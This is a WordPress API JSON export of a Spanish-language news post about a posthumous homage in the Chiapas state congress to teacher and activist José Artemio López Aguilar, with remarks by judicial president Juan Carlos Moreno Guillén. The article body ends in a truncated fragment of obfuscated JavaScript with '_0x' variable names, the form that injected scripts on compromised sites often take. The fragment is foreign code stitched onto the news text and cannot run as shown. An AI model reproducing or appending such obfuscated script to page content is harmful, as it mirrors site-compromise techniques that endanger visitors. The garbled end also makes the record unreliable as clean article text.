{"id":21905,"date":"2025-05-14T05:50:13","date_gmt":"2025-05-14T05:50:13","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21905"},"modified":"2025-05-14T05:50:14","modified_gmt":"2025-05-14T05:50:14","slug":"maestro-jose-artemio-lopez-aguilar-un-ejemplo-de-la-lucha-por-la-paz-en-todo-chiapas-moreno-guillen","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21905","title":{"rendered":"Maestro Jos\u00e9 Artemio L\u00f3pez Aguilar, un ejemplo de la lucha por la paz en todo Chiapas: Moreno Guill\u00e9n"},"content":{"rendered":"\n<p><\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"21906\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250513-WA0042-1024x683.jpg\" alt=\"\" class=\"wp-image-21906\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250513-WA0042-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250513-WA0042-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250513-WA0042-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250513-WA0042-1536x1024.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250513-WA0042-2048x1366.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"21907\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250513-WA0041-1024x683.jpg\" alt=\"\" class=\"wp-image-21907\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250513-WA0041-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250513-WA0041-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250513-WA0041-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250513-WA0041-1536x1024.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250513-WA0041-2048x1366.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"21909\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250513-WA0043-1024x683.jpg\" alt=\"\" class=\"wp-image-21909\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250513-WA0043-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250513-WA0043-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250513-WA0043-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250513-WA0043-1536x1024.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250513-WA0043-2048x1366.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"21908\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250513-WA0044-1024x683.jpg\" alt=\"\" class=\"wp-image-21908\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250513-WA0044-1024x683.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250513-WA0044-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250513-WA0044-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250513-WA0044-1536x1024.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250513-WA0044-2048x1366.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Asisti\u00f3 al homenaje p\u00f3stumo del activista Jos\u00e9 Artemio L\u00f3pez Aguilar.<\/li>\n<\/ul>\n\n\n\n<p>13 de mayo del 2025. El magistrado presidente del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, junto al gobernador Eduardo Ram\u00edrez Aguilar y al presidente de la Mesa Directiva del Congreso del Estado, Luis Ignacio Avenda\u00f1o Berm\u00fadez, acudi\u00f3 a la Sesi\u00f3n Solemne &#8220;Una vida y un legado por la educaci\u00f3n y la paz en Chiapas&#8221;, celebrada en el Congreso del Estado, para rendir homenaje p\u00f3stumo al maestro y activista chiapaneco Jos\u00e9 Artemio L\u00f3pez Aguilar.<\/p>\n\n\n\n<p>Tras esta ceremonia emotiva en la que estuvo presente la esposa del homenajeado, Osiris Cabrera y familiares, Moreno Guill\u00e9n destac\u00f3 que el maestro Jos\u00e9 Artemio L\u00f3pez Aguilar es un ejemplo de la lucha por la paz en Chicomuselo y de todo Chiapas. Un convencido de la Paz Cultural como modo de vida en la comunidad.<\/p>\n\n\n\n<p>\u201cSu valor ya ha trascendido su tiempo y espacio, ofrend\u00f3 con su vida la lucha para que en Chiapas no entrara la violencia y sus ideales prevalecer\u00e1n inc\u00f3lumes en su municipio. Escuchar a su hijo, Jos\u00e9 Mar\u00eda L\u00f3pez, recordar a su padre, mueve las fibras m\u00e1s \u00edntimas de nuestro ser. Nos llama a tener valor y templanza para los retos y nuestro servicio. Su legado vive en su familia, alumnas y alumnos\u201d, asegur\u00f3.<\/p>\n\n\n\n<p>Al tiempo que reconoci\u00f3 que el \u201cprofe Temo\u201d nos inspira para ser mejores chiapanecas y chiapanecos, nos obliga a dar todo por Chiapas y, sin duda, ser\u00e1 un ejemplo para la presente y posteriores generaciones de entrega y convicci\u00f3n.<\/p>\n\n\n\n<p>Para finalizar, Juan Carlos Moreno Guill\u00e9n felicit\u00f3 ampliamente al Honorable Congreso del Estado por este reconocimiento c\u00edvico a un m\u00e1rtir de nuestros d\u00edas, porque estos actos deben permanecer en la conciencia colectiva para que todas y todos luchemos por un mejor Chiapas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Asisti\u00f3 al homenaje p\u00f3stumo del activista Jos\u00e9 Artemio L\u00f3pez Aguilar. 13 de mayo del 2025. El magistrado presidente del Poder Judicial del Estado, Juan Carlos Moreno Guill\u00e9n, junto al gobernador Eduardo Ram\u00edrez Aguilar y al presidente de la Mesa Directiva del Congreso del Estado, Luis Ignacio Avenda\u00f1o Berm\u00fadez, acudi\u00f3 a la Sesi\u00f3n Solemne &#8220;Una vida &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21909,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-21905","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21905","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21905"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21905\/revisions"}],"predecessor-version":[{"id":21910,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21905\/revisions\/21910"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21909"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21905"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21905"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21905"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}